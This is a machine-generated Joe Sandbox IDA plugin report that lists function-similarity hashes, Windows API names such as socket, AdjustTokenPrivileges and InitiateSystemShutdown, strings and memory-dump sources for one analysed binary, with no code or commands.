                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: ERCP$PCRE$VUUU$VUUU$VUUU$VUUU
                                                                        • API String ID: 0-2187161917
                                                                        • Opcode ID: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                        • Instruction ID: 7dda8b1b66a4b13565d6c5202b372113d3176b26b56f23d88817d66b82423b94
                                                                        • Opcode Fuzzy Hash: 52bbb01250ada343afc02eebb5c988e0963da5400e9343603d667423943af628
                                                                        • Instruction Fuzzy Hash: 9BB29072E086928AEB648F6D94406BD37A1FB5978CF104135EB4ED7BA8DF78E940C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 4170576061-0
                                                                        • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                        • Instruction ID: 5ac1478b9ca3302120d5e35069ea3eabf857f0ef0928d9823ec035e0c8dd1b40
                                                                        • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                        • Instruction Fuzzy Hash: 2151D526B0865281EB24EB1AE4056B97790BB8EFE8F448531DF5E877A6DE3CD5008780
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AsyncState$ClientCursorScreen
                                                                        • String ID:
                                                                        • API String ID: 4210589936-0
                                                                        • Opcode ID: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                        • Instruction ID: 9e4811a579319b018e3eb4d247e69263adcdfcc626feede5f3848d9d99576982
                                                                        • Opcode Fuzzy Hash: 66afa1c94deaf905156041cf676ffe3a2b02e9b0039980c06c23d4dff2918920
                                                                        • Instruction Fuzzy Hash: 3A51BF32B196928BE758CF39D94456A77A5FB4A798F100231EF5AC37A5CF38E461C700
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _handle_error
                                                                        • String ID: !$VUUU$fmod
                                                                        • API String ID: 1757819995-2579133210
                                                                        • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                        • Instruction ID: 7d7f32e7af4083837cd6794ec241b3468e9a93347cffcc84e856edfea7dd8098
                                                                        • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                        • Instruction Fuzzy Hash: BBB1F721A1CFC545D6B38A3854123B6B259BFAE394F14D332EB5E76AB4DF2C95C28700
                                                                        APIs
                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6BB162D60
                                                                          • Part of subcall function 00007FF6BB15B184: GetCurrentProcess.KERNEL32(00007FF6BB15B21D), ref: 00007FF6BB15B1B1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                        • String ID: *$.$.
                                                                        • API String ID: 2518042432-2112782162
                                                                        • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                        • Instruction ID: bf4ca5b936e3f3c0a67752fbeca0787e5619a0197602661273413f8a64996085
                                                                        • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                        • Instruction Fuzzy Hash: E151CE72F14A5585FB10CFAA98402BD67A4BB48BCCF548536DF0EA7BA8DF38D4468340
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                        • String ID:
                                                                        • API String ID: 1286766494-0
                                                                        • Opcode ID: 09e4e907ae870b3820667c0232f28915d6dd8b336669930dd8abe80671f645cd
                                                                        • Instruction ID: e11a5d2be741a62b8cbebafa66ffab6e92f758075a4b770459a3a2269e32ca2b
                                                                        • Opcode Fuzzy Hash: 09e4e907ae870b3820667c0232f28915d6dd8b336669930dd8abe80671f645cd
                                                                        • Instruction Fuzzy Hash: 4CA29072A19682CAEB258F2CD4901BD37A5FB49B8CF148135DB8D87BA8DF3DE5118704
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                        • String ID: SeShutdownPrivilege
                                                                        • API String ID: 2163645468-3733053543
                                                                        • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                        • Instruction ID: 2561a9f2433df493cd676c085abc911e507f21dfc339553b77e7dfaaf6694e74
                                                                        • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                        • Instruction Fuzzy Hash: D4117333B1864282E764DB2DE84117E6262BF88758F494135E79DC3ABAEF3CD846C740
                                                                        APIs
                                                                        Strings
                                                                        • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF6BB145C43
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                        • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                        • API String ID: 389471666-631824599
                                                                        • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                        • Instruction ID: 82a80434eb4902a6b3e09b4f8a2557dce7e76e48cf2a109b1f0b98d6053d28fb
                                                                        • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                        • Instruction Fuzzy Hash: 73113A32A14B5296FB049B2AE6553B933A4FB4838DF444135C74D82A60EF3CE0A4CB10
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AddressLibraryLoadProc
                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                        • API String ID: 2574300362-192647395
                                                                        • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                        • Instruction ID: 5290bb47ced42ef32a8fb81ac29cf678e10070bbe2fdd6a9e34329358edfa96a
                                                                        • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                                        • Instruction Fuzzy Hash: C9E01A61956B0282EF148B28F45436823E0FB4CB4CF840435CA6D86374EFBCD7A5C300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 1083639309-0
                                                                        • Opcode ID: 926a5f41c70e85f903ad13907dcdbfaef4bd4711574ecbe01ebdb8b6e25b81d1
                                                                        • Instruction ID: 91e75dbe969b17afee416354fc2651edf05ede28cf6ae6dc61d2b7df09e8b4dd
                                                                        • Opcode Fuzzy Hash: 926a5f41c70e85f903ad13907dcdbfaef4bd4711574ecbe01ebdb8b6e25b81d1
                                                                        • Instruction Fuzzy Hash: A6417422A19A8295E710EF69E4445BE7764FB8CB88F549032EF8D83765DF7CD506CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Init_thread_footer
                                                                        • String ID:
                                                                        • API String ID: 1385522511-0
                                                                        • Opcode ID: 5c7faa34d427e9d0143d03f46ca3f078198316e7e168904c09c6ed3f3deaed2c
                                                                        • Instruction ID: ce751b88959f33d3dc25aba7c9572e918d912c6d9ab970761ff435aabd0c3a26
                                                                        • Opcode Fuzzy Hash: 5c7faa34d427e9d0143d03f46ca3f078198316e7e168904c09c6ed3f3deaed2c
                                                                        • Instruction Fuzzy Hash: F2826932A08A5296EB64CF19E4946B973A4FB4CB88F540136DB4E977B4EF3DE841C700
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $[$\
                                                                        • API String ID: 0-3681541464
                                                                        • Opcode ID: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                        • Instruction ID: f19e80f89ddcfbca06cc9436c6271defa4d5d96b06b60345e5f1ffa86e99b4c3
                                                                        • Opcode Fuzzy Hash: f7681cbd2ea07fa149fa3418819e144fbe1fe0a990a0ed3c69471eaae0dbb131
                                                                        • Instruction Fuzzy Hash: B7B26C72B186528AEB64CF69C8446AC37B1FB4874CF514136DB0D97BA8EF39E941CB40
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: memcpy_s
                                                                        • String ID:
                                                                        • API String ID: 1502251526-0
                                                                        • Opcode ID: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                        • Instruction ID: 118d279f84706e2f9387fc064f3c5bd5e1ee868d0ef2308ad73cd4341be14493
                                                                        • Opcode Fuzzy Hash: 4319a682b676806559ada1e1e2a537e8d5e8e6a4cd1916f84ce5e893799bb061
                                                                        • Instruction Fuzzy Hash: 5DD1B732B1868687DB35CF19E1947AAB7A1FB88788F148134DB4E97B54DE3CE851CB04
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Find$File$CloseFirstNext
                                                                        • String ID:
                                                                        • API String ID: 3541575487-0
                                                                        • Opcode ID: 48e57e618d05c1161541fb2cfdf83d6530d09c7224f4e65aa15c5650d3fdf655
                                                                        • Instruction ID: 2e2cef3e7f794c5892f0d8828a61b0a851ac02b75ad2249d2ea6d474f3e84681
                                                                        • Opcode Fuzzy Hash: 48e57e618d05c1161541fb2cfdf83d6530d09c7224f4e65aa15c5650d3fdf655
                                                                        • Instruction Fuzzy Hash: FE516C32608A4686DB14DF29D4942AC77A0FB88BD8F504232CB6E877B5CF7CE555CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue
                                                                        • String ID:
                                                                        • API String ID: 1766415185-0
                                                                        • Opcode ID: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
                                                                        • Instruction ID: 1544679771de607db757f63c2e6285131f2b4675e2258e1dc860a5f353b24443
                                                                        • Opcode Fuzzy Hash: bd9ee305005d20edf5c11873021be34db603942109d79114471410cc239d0158
                                                                        • Instruction Fuzzy Hash: AF219C23A48B1186EB10DF19E8046AA67A5FB4CB98F868039DF5D83664DF3CE585C750
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                        • String ID:
                                                                        • API String ID: 2278415577-0
                                                                        • Opcode ID: e1f471287d7ae325138f9b5ee0daaff0da076fe013a1d85fba995b81598feca8
                                                                        • Instruction ID: 58feef34868c8435fb14824f6a7c810ea5ad5f540cbf3bf8478f08cd91f08c3f
                                                                        • Opcode Fuzzy Hash: e1f471287d7ae325138f9b5ee0daaff0da076fe013a1d85fba995b81598feca8
                                                                        • Instruction Fuzzy Hash: A721AC72A08A8586DB04DF2AF44026AB7A1FB8CBD8F488439DF4C87728CF78D556C700
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                        • String ID:
                                                                        • API String ID: 33631002-0
                                                                        • Opcode ID: a8212eb04a4308763a1976214b907e8d9402944d66f39c78de83db0e04bb04f6
                                                                        • Instruction ID: 959c23dd27d2e1c961e1b5f168d3b745470fb63d217d5b76e28c800e332ca4af
                                                                        • Opcode Fuzzy Hash: a8212eb04a4308763a1976214b907e8d9402944d66f39c78de83db0e04bb04f6
                                                                        • Instruction Fuzzy Hash: B0116036608B8197E3508B19F44055EBBE4F788BA4F64423ADB9D43B64DF7CD955CB00
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                        • String ID:
                                                                        • API String ID: 3429775523-0
                                                                        • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                        • Instruction ID: e6017286f30e12103699b62b2a1857d401eb8b1281d91e0ec5de45477c4f621a
                                                                        • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                        • Instruction Fuzzy Hash: D20100736247818FE7108F24E4553AA37B0F75476EF500929E64986A99CF7DC158CF80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .
                                                                        • API String ID: 0-248832578
                                                                        • Opcode ID: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                        • Instruction ID: ac3859e53d4fcd2927c9e2a2cbec39b312b052b5399f67fb6844e5ed3d5b1473
                                                                        • Opcode Fuzzy Hash: e1d1fb4f290d3f8f73012e05781d19b6c344ca2143228aded1dc3f30a5d54e4e
                                                                        • Instruction Fuzzy Hash: 4A316A61F1869144EB209F7EA804676B691FB58BE8F548635EF5E87BE4DE3CD4058300
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
